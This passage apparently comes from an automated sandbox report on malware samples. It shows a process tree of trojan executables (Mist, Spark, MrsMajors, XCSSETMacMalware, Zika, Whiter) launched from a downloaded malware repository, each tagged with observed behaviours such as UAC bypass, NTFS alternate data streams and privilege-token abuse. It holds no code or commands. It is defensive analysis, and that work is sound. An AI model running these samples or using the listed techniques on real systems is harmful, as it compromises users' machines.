                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2224
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\A36Z07S6H18D2HN8W74.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\A36Z07S6H18D2HN8W74.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1016
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\C12N18Z0L84X5WF4M23.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\C12N18Z0L84X5WF4M23.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:1796
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\F43P08Q2D57I4KG2X03.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\F43P08Q2D57I4KG2X03.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5192
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\I00R40T3T20S1HA0K28.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\I00R40T3T20S1HA0K28.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1380
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Whiter.a.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Whiter.a.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J78A81E2T24F5RR6Z51.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J78A81E2T24F5RR6Z51.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:6016
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\M36C32H3K86P2PM3N76.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\M36C32H3K86P2PM3N76.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5576
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\H80U83D1U51S2CV6X23.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\H80U83D1U51S2CV6X23.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    PID:2224
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\I61H13A8G47H5JZ7U10.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\I61H13A8G47H5JZ7U10.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2976
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R43S33E8F35U5SE7N04.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R43S33E8F35U5SE7N04.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2004
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Zika.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Zika.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                PID:3116
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J83U64M7M31X4KJ1R75.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J83U64M7M31X4KJ1R75.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5812
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\D78L85L0D15V0ZZ7L26.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\D78L85L0D15V0ZZ7L26.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5368
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\T03P14N4S26X2JY5Z23.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\T03P14N4S26X2JY5Z23.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\I85B86I4Y53A3DR1M45.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\I85B86I4Y53A3DR1M45.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:4112
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R56M16M5Y41N3LW1F30.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R56M16M5Y41N3LW1F30.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5592
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\J84P86Z0M27X6DC1I31.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\J84P86Z0M27X6DC1I31.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:4728
                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5576
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\K41F16J5G80L6VQ3Y87.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\K41F16J5G80L6VQ3Y87.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2316
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M02H17A7L14Y8CP8Z35.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M02H17A7L14Y8CP8Z35.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5652
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M50B72M7L60T1YS3F62.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M50B72M7L60T1YS3F62.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\NETFramework.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\NETFramework.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  PID:3784
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\M57Y76R0M72L8VQ5C62.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\M57Y76R0M72L8VQ5C62.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2352
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInfected_newest.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInfected_newest.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2444
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInstaller.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInstaller.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  PID:5496
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInstallerRC.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\MistInstallerRC.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  PID:6068
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\Q55O84K4P15O0FB6D56.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\Q55O84K4P15O0FB6D56.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\U62F60C7I03T7LQ2C66.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\U62F60C7I03T7LQ2C66.exe"
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4524
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\X55D25S7W67A0XD3C11.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\X55D25S7W67A0XD3C11.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    PID:1116
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\D48J22L8J87U2MX8Z33.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\D48J22L8J87U2MX8Z33.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:4380
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\E37P65A1Z03I0BC8L81.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\E37P65A1Z03I0BC8L81.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    PID:2336
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\G37X85C3M28X6KV6E76.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\G37X85C3M28X6KV6E76.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    PID:5604
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J03Z30J6V06J5AY6R36.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J03Z30J6V06J5AY6R36.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    PID:4904
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J78A81E2T24F5RR6Z51.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J78A81E2T24F5RR6Z51.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    PID:2040
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J83U64M7M31X4KJ1R75.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J83U64M7M31X4KJ1R75.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R43S33E8F35U5SE7N04.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R43S33E8F35U5SE7N04.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:5800
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R56M16M5Y41N3LW1F30.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R56M16M5Y41N3LW1F30.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    PID:1996
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R66R62J3H17Y4BL7F81.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R66R62J3H17Y4BL7F81.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:2420
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T17E38Z5U78S0OA1T50.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T17E38Z5U78S0OA1T50.exe"
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:1664
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T23P36N5F77Y6DV3Q82.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T23P36N5F77Y6DV3Q82.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\E20V67S5I68P0YP4Q65.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\E20V67S5I68P0YP4Q65.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                      • System policy modification
                                                                                                                                                                                                                                                                                                                                                      PID:3404
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\F45D57J8K80X8TZ8L24.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\F45D57J8K80X8TZ8L24.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      PID:1496
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\I00R40T3T20S1HA0K28.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\I00R40T3T20S1HA0K28.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                      • System policy modification
                                                                                                                                                                                                                                                                                                                                                      PID:4972
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\K12B64M6V87J1NJ0N86.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\K12B64M6V87J1NJ0N86.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                      • System policy modification
                                                                                                                                                                                                                                                                                                                                                      PID:3836
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\MrsMajor3.0.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\MrsMajor3.0.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • UAC bypass
                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                      • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                      • System policy modification
                                                                                                                                                                                                                                                                                                                                                      PID:560
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\P26K17V7B88X2QS2L78.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\P26K17V7B88X2QS2L78.exe"
                                                                                                                                                                                                                                                                                                                                                        2⤵
